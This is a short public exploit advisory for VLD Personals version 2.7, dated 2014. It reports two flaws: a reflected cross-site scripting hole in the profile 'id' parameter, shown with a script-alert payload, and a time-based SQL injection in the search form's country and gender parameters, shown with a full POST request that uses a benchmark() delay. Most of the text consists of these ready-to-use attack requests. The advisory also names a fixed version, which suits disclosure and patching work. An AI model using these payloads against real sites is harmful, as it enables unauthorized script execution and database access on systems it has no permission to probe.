43 lines
No EOL
1.5 KiB
Text
43 lines
No EOL
1.5 KiB
Text
# Exploit Title: VLD Personal – Multiple Vulnerabilities
|
||
# Date: 09/11/2014
|
||
# Exploit Author: Mr T
|
||
# Exploit Authors Website: http://www.securitypentester.ninja
|
||
# Vendor Homepage: http://www.vldpersonals.com/
|
||
# Software Link: http://www.vldpersonals.com/clients/downloads.php
|
||
# Vulnerable Version: 2.7
|
||
# Fixed Version 2.7.1
|
||
# Tested on: Windows / Linux
|
||
|
||
XSS Attack
|
||
|
||
Issue detail:
|
||
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
|
||
|
||
Response :
|
||
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
|
||
|
||
|
||
|
||
SQL Injection:
|
||
Issue detail:
|
||
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter.
|
||
|
||
Response:
|
||
POST /index.php?m=search HTTP/1.1
|
||
Host: localhost
|
||
Accept: */*
|
||
Accept-Language: en
|
||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||
Connection: close
|
||
Referer: http://localhost/index.php
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 92
|
||
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
|
||
>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
|
||
>&gender2=2&type_id=members
|
||
>&country=
|
||
>1%20and%20benchmark(20000000%2csha1(1))–%20
|
||
|
||
|
||
--
|
||
Talib Osmani |